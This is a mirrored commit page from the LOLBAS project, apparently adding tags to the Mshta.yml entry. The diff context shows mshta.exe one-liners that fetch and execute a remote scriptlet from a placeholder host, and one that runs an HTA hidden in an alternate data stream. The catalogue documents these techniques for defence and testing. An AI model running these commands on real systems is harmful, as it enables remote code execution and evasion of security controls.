mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-01-02 10:07:01 +01:00
Update Mshta.yml Tags
Added Tags: Execute: Remote Input Custom Format Execute JScript Execute VBScript
This commit is contained in:
parent
b8d98f067d
commit
bd07c4dd24
@ -13,6 +13,8 @@ Commands:
|
|||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||||
Tags:
|
Tags:
|
||||||
- Execute: WSH
|
- Execute: WSH
|
||||||
|
- Execute: Remote
|
||||||
|
- Input: Custom Format
|
||||||
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
|
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
|
||||||
Description: Executes VBScript supplied as a command line argument.
|
Description: Executes VBScript supplied as a command line argument.
|
||||||
Usecase: Execute code
|
Usecase: Execute code
|
||||||
@ -20,6 +22,8 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218.005
|
MitreID: T1218.005
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||||
|
Tags:
|
||||||
|
- Execute: VBScript
|
||||||
- Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close();
|
- Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close();
|
||||||
Description: Executes JavaScript supplied as a command line argument.
|
Description: Executes JavaScript supplied as a command line argument.
|
||||||
Usecase: Execute code
|
Usecase: Execute code
|
||||||
@ -27,6 +31,8 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218.005
|
MitreID: T1218.005
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||||
|
Tags:
|
||||||
|
- Execute: JScript
|
||||||
- Command: mshta.exe "C:\ads\file.txt:file.hta"
|
- Command: mshta.exe "C:\ads\file.txt:file.hta"
|
||||||
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
||||||
Usecase: Execute code hidden in alternate data stream
|
Usecase: Execute code hidden in alternate data stream
|
||||||
|
Loading…
Reference in New Issue
Block a user